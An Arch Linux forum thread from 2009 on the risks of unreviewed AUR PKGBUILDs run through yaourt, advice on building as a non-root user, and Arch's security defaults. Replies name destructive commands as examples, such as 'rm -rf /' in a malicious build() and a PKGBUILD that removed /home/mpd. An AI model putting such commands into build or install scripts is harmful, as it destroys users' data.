You are not logged in.
- Topics: Active | Unanswered
#1 2009-07-15 19:19:25
- eyolf
- Member
- From: Copenhagen
- Registered: 2005-11-29
- Posts: 339
- Website
"Highly recommended for security reasons"
I've always wondered: whenever I install something via yaourt, I get the reminder that I should check the PKGBUILD and the install files, "for security reasons". I acknowledge that, of course, but:
1. has anyone ever suffered any damage from malicious lines of script in a PKGBUILD? And I'm not thinking of damage of the "x broke app y" kind, which can be restored by reinstalling the old package, but the deliberate attack, and/or the unrecoverable damage.
2. How easy/difficult would it be to make such damage? (If someone has an answer to #2, any examples should perhaps be kept vague...)
A third question would be: how secure is Arch/Pacman?
Offline
#2 2009-07-15 19:31:06
- brisbin33
- Member
- From: boston, ma
- Registered: 2008-07-24
- Posts: 1,799
- Website
Re: "Highly recommended for security reasons"
anyone can write anything in a PGBUILD's build() function. this function is then executed --as root-- via yaourt.
that means there could be something as obvious as rm -rf /, or as subtle as some weird obfuscated forkbomb, who knows. i doubt that it's ever happened but it's entirely possible.
for this reason, it's recommended to build packages as normal user with makepkg (where damage is contained by your file permissions) and only do the actual installing as root via pacman -U.
with yoaurt, you either run it as root or not; and you can't install w/o root privileges. my personal AUR script does everything as user, then calls sudo pacman -U (and i have a NOPASSWD line in /etc/sudoers for that command). this, i think, is a better way to maintain security while still automating aur activities.
as with anything in linux, it is up to _you_ to manage your own level of risk; and determine what you're comfortable doing with/to _your_ system
//github/
Offline
#3 2009-07-15 19:31:59
- Dusty
- Schwag Merchant
- From: Medicine Hat, Alberta, Canada
- Registered: 2004-01-18
- Posts: 5,986
- Website
Re: "Highly recommended for security reasons"
2. How easy/difficult would it be to make such damage? (If someone has an answer to #2, any examples should perhaps be kept vague...)
the pkgbuild downloads a source file and installs it on your computer. There's nothing stopping someone from uploading a pkgbuild that downloads a malicious source file instead of the one you expected. Its really really easy. To the best of my knowledge it hasn't happened yet but its only a matter of time. Check every pkgbuild every time... I suppose if you know and trust the maintainer of that particular file you'd be safe though.
A third question would be: how secure is Arch/Pacman?
Arch has all the standard security tools and is typically more up to date than most distros, so is quite secure in that aspect. Pacman doesn't support package signing yet which means that any mirror could, in theory, inject a malicious package into the repositories, as could someone with control of any portion of the path between the mirror and your computer.
Dusty
Last edited by Dusty (2009-07-15 19:34:23)
Offline
#4 2009-07-15 19:59:42
- Mr.Elendig
- #archlinux@freenode channel op
- From: The intertubes
- Registered: 2004-11-07
- Posts: 4,097
Re: "Highly recommended for security reasons"
I've seen quite a few PKGBUILDs that does stupid things, like 'rm /usr/share/foobar' instead of rm $pkgdir/usr/share/foobar' and similar.
The worst I've seen did rm rf /home/mpd in post_remove()
Evil #archlinux@libera.chat channel op and general support dude.
. files on github, Screenshots, Random pics and the rest
Offline
#5 2009-07-15 20:14:38
- stefan1975
- Member
- From: 53 6e 65 65 6b
- Registered: 2007-04-16
- Posts: 195
Re: "Highly recommended for security reasons"
well security in Arch is like all things in Arch imho. It is as secure as you make it yourself. By default is does not a lot in the way of security though:
- no (iptables) firewall by default
- no SeLinux (by default)
- no security alerts
- no package signing
- sparse documentation on packages/updates
- relative ease by which yaourt could be misused to inject malicious code into your system (when run as root or sudo with NOPASSWD)
- no password complexity enforcing
- no LUKS disk encyption by default during installation
- no ssh by default
none of these are neccesarily bad imho, it is just the way Arch works, like a swiss army knife. It can be made secure but you have to DIY, much unlike for example fedora/RHEL with selinux/encryption/iptables/ssh/complexity/package-signing by default. Neither is better or worse then the other, it is just something someone has to take into account when selecting his distro of choice and securing it to the level he needs. for a secure OOTB experience i would not select Arch, but then again linux in any form is already much more secure then Windows.
stefan
"root# su - bofh"
OS: F10_x64, Arch, Centos5.3, RHEL4.7, RHEL5.3
Desktop Hardware: Dell Precision M65 laptop, core2duo, 2gb, 80gb 7200rpm
Registered linux user #459910 since 1998
Offline
#6 2009-07-15 20:23:35
- keenerd
- Package Maintainer (PM)
- Registered: 2007-02-22
- Posts: 647
- Website
Re: "Highly recommended for security reasons"
with yoaurt, you either run it as root or not; and you can't install w/o root privileges. my personal AUR script does everything as user, then calls sudo pacman -U (and i have a NOPASSWD line in /etc/sudoers for that command). this, i think, is a better way to maintain security while still automating aur activities.
I have not looked at the code, but that description does not match its behavior. If you launch it as root, it will yell at you to run it as user. If you run it as user, it will build the package as user. Then it will ask for your password in order to attempt "sudo pacman". Then it will ask for root's password to "su root pacman". Yaourt will also handle updates and provides several useful extensions to pacman's options. "-Su --devel" and "-Su --downgrade" for exciting and dull days, respectively.
Offline
#7 2009-07-15 20:33:29
- brisbin33
- Member
- From: boston, ma
- Registered: 2008-07-24
- Posts: 1,799
- Website
Re: "Highly recommended for security reasons"
brisbin33 wrote:with yoaurt, you either run it as root or not; and you can't install w/o root privileges. my personal AUR script does everything as user, then calls sudo pacman -U (and i have a NOPASSWD line in /etc/sudoers for that command). this, i think, is a better way to maintain security while still automating aur activities.
I have not looked at the code, but that description does not match its behavior. If you launch it as root, it will yell at you to run it as user. If you run it as user, it will build the package as user. Then it will ask for your password in order to attempt "sudo pacman". Then it will ask for root's password to "su root pacman". Yaourt will also handle updates and provides several useful extensions to pacman's options. "-Su --devel" and "-Su --downgrade" for exciting and dull days, respectively.
well how bout that. nevermind then... ignore my uneducated ramblings. i see the lore of yaourt, but i like to keep separate tools for pacman and aur, and my script does all that fun checking for aur updates stuff too 
//github/
Offline
#8 2009-07-17 17:55:39
- R00KIE
- Forum Fellow
- From: Between a computer and a chair
- Registered: 2008-09-14
- Posts: 4,734
Re: "Highly recommended for security reasons"
Regarding question number three I agree with stefan1975, with arch you build your security yourself, you learn how to configure the system and the security tools and you decide why you need them and learn how they work. You start with a system with less security measures and evolve to a system with more security measures.
With systems that bring the whole lot out of the box things can get in your way if you don't understand how things work, then probably you end up disabling some things until you can figure out how to use them.
R00KIE
Tm90aGluZyB0byBzZWUgaGVyZSwgbW92ZSBhbG9uZy4K
Offline